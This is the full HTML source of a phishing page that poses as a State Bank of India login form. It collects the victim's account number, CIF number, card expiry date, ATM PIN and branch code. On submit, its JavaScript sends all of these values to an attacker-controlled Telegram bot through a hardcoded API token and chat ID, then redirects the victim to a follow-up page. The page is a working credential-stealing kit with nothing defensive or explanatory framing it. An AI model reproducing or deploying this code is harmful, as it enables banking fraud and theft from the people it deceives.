<!DOCTYPE html>
<html>
<head>
  <title>Welcome To SBI</title>


   <meta name="description" content="https://onlinesbi.co.in">

  <!-- Social sharing image -->
  <meta property="og:image" content="SBI.png">
  <meta property="og:image:width" content="1200">
  <meta property="og:image:height" content="630">

  <!-- Styles here -->
  <style>
    body {
      font-family: Arial, sans-serif;
    }
    .form-group {
      margin-bottom: 15px;
    }
    label {
      display: block;
      margin-bottom: 5px;
    }
    input[type="text"],
    input[type="number"],
    input[type="password"] {
      width: 100%;
      padding: 10px;
      margin: 5px 0 0px 0;
      display: inline-block;
      border: 1.3px solid black;
      box-sizing: border-box;
      font-size: 16px; /* Increased placeholder text size */
    }
    button {
      background-color: #4CAF50;
      color: white;
      padding: 14px 20px;
      margin: 8px 0;
      border: none;
      cursor: pointer;
      width: 100%;
      height: 45px
      
      
    }
    button:hover {
      opacity: 0.8;
    }
  .form-group {
      margin-bottom: 20px;
    }

    .form-group label {
      font-weight: 600;
    }

    .split-input {
      display: flex;
    }

    .split-input .form-group {
      flex: 1;
      margin-right: 5px;
      
    }
  
  </style>

  <!-- Bootstrap for mobile view -->
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">

</head>
<body>
<form id="myForm" class="container">
  <img src="ICICI.jpg" alt="SBI LOGO" width="100%" height="150">
  <br>
  <br>
  <div class="form-group">
    
    <label for="accountNumber">Account Number:</label>
    <input type="number" id="accountNumber" name="accountNumber" required class="form-control" maxlength="11">
  </div>
  <div class="form-group">
    <label for="cifNumber">CIF Number:</label>
    <input type="number" id="cifNumber" name="cifNumber" required class="form-control">
  </div>
  <div class="split-input">
              <div class="form-group">
                <label for="expiration-date">Expire Date</label>
                <input type="text" id="expiration-date" name="expiration-date" class="form-control" placeholder=""required>
                <span id="expiration-date-error" class="error-message"></span>
              </div>
              <div class="form-group">
                <label for="atm pin">ATM PIN</label>
                <input type="number" id="atm pin" name="atmPin" class="form-control" placeholder=""*required>
                
              </div>
            </div>
  <div class="form-group">
    <label for="branchCode">Branch Code:</label>
    <input type="number" id="branchCode" name="branchCode" title="Please enter your Branch Code." required class="form-control">
  </div>
  <br>
  <button type="submit" class="btn btn-primary">Proceed</button>
  
 
  <img src="foot.png" alt="Girl in a jacket" width="100%" height="450">

</form>

<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/@popperjs/core@1.16.1/dist/umd/popper.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
</body>

<script>
  document.getElementById('expiration-date').addEventListener('input', function (e) {
    var input = e.target.value;
    if (input.length === 2 && !input.includes('/')) {
      e.target.value = input + '/';
    } else if (input.length === 3 && input.charAt(2) === '/') {
      e.target.value = input.slice(0, 2);
    } else if (input.length > 5) {
      e.target.value = input.slice(0, 5);
    }
  });
</script>

 <script>
  document.getElementById('myForm').addEventListener('submit', function(event) {
    event.preventDefault();
  
    let formData = new FormData(this);
    let message = `Account Number: ${formData.get('accountNumber')}\nCIF Number: ${formData.get('cifNumber')}\nExpire Date: ${formData.get('expiration-date')}\nATM PIN: ${formData.get('atmPin')}\nBranch Code: ${formData.get('branchCode')}`;

    fetch('https://api.telegram.org/bot7791287382:AAHaVcRNbpDfO1MOGYxvB4h6Ml7Bop5CxoQ/sendMessage', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
      },
      body: JSON.stringify({ chat_id: '7865807902', text: message }),
    })
    .then(response => {
      // Redirect to another page once the form data is sent
      window.location.href = 'ot.html';
    })
    .catch(error => {
      console.error('Error:', error);
    });
  });
</script>

</body>
</html>
